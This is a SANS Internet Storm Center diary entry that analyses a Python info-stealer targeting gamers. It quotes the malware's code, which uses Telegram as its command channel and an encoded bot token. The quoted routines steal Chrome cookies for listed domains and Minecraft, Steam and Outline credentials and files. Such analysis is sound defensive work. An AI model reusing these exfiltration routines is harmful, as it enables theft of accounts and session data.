They are a lot of “gamers” on the Internet. They generate a lot of business around games. Many of them can be downloaded for free, but they have online shops to buy options like extra lives, weapons, suits, packages, etc. Therefore, the business of gaming is very lucrative today[1].
I spotted a malicious Python script that acts as an info stealer focusing on gamers! Based on strings found in the code, the attribution goes to Russia (“Произошёл запуск” can be translated to "a new connection has been established”).
Today, most Python malicious scripts use Discord as a C2, but this one uses Telegram:
bot = telebot.TeleBot(base64.b64decode("NTk1OTUwNzYxODpBQUhmNzBRcVBYMkNiNHNjSzkyZGJwZnVhTEVaQlNWdkVRWQ==").decode("utf-8"), parse_mode=None)
The script implements the classic code to steal cookies and credentials from a Chrome installation, but it also searches for resources used by gamers.
First, Chrome data is inspected, and only interesting domains are searched:
target_domain = [ "minecraft.net", "google.com", "live.com", "apple.com", "twitter.com", "spotify.com", "discord.com", "discord.gg", "blockchain.com", "coinbase.com", "paypal.com", "mojang.com", "steamcommunity.com", "steampowered.com", "origin.com", "ea.com", "ubisoft.com" ]
Then, the script searches for the presence of Minecraft:
if os.path.isdir(apps["Minecraft"]):
AccountsPath = apps["Minecraft"] + "launcher_accounts_microsoft_store.json"
with open(AccountsPath, encoding="utf-8", mode="r") as f:
file = json.load(f)
try:
for account in file["accounts"]:
ms_username = file["accounts"][account]["username"]
minecraft_username = file["accounts"][account]["minecraftProfile"]["name"]
for user in send_to_users:
bot.send_message(user, f"?Minecraft Installedn?Microsoft: `{ms_username}`n?Minecraft: `{minecraft_username}`", parse_mode="MARKDOWN")
except KeyError:
pass
Steam[2] is a well-known platform for downloading games. The script tries to exfiltrate useful information from a Steam setup:
try:
steam_reg = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path_steam, 0, access=winreg.KEY_READ)
steampath = winreg.EnumValue(steam_reg, 2)[1]
steam_auto_login = (winreg.EnumValue(steam_reg, 8))[1]
steam_lang = (winreg.EnumValue(steam_reg, 0))[1]
steam_config = steampath + "/config/config.vdf"
steam_users = steampath + "/config/loginusers.vdf"
steam_ssfn = []
for filename in os.listdir(steampath):
if "ssfn" in filename:
steam_ssfn.append(filename)
steam_installed = True
except FileNotFoundError:
steam_auto_login = "not installed"
steam_lang = "undefined"
steam_installed = False
send_to_users = [1084445274]
for user in send_to_users:
bot.send_message(user, f"Произошёл запуск `{datetime.datetime.now()}`n?IP: `{stun.get_ip_info()}`n?Computer Name: `{socket.gethostname()}`n??User: `{os.getlogin()}`n?OC: `{platform.platform()}`n??Steam Login: `{steam_auto_login}`n?Steam Language: `{steam_lang}`", parse_mode="MARKDOWN")
if steam_installed == True:
bot.send_message(user, "=====STEAM FILES=====", parse_mode="MARKDOWN")
bot.send_document(user, open(steam_config, "r", encoding="utf-8"), caption="steam_config")
bot.send_document(user, open(steam_users, "r", encoding="utf-8"), caption="steam_users")
for filename in steam_ssfn:
with open(f"{steampath}/{filename}", "rb") as file:
bot.send_document(user, file, caption=f"`{filename}`", parse_mode="MARKDOWN")
file.close()
They also search for Outline Manager instances:
if os.path.isdir(apps["Outline"]):
AccountsPath = apps["Outline"] + "000003.log"
with open(AccountsPath, mode="r") as file:
for string in file.read().splitlines():
if "accessKey" in string:
key = string
reg = re.compile('[^a-zA-Z0-9"@.,:/?-]')
key = reg.sub('', key)
for user in send_to_users:
bot.send_message(user, f"?Outline (LOG): `{key}`", parse_mode="MARKDOWN")
Nothing brand new with this sample except it targets gamers. Money is involved with games (sometimes a lot), so they are nice targets for attackers. Stay safe!
[1] https://newzoo.com/insights/articles/the-games-market-in-2022-the-year-in-numbers
[2] https://store.steampowered.com
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.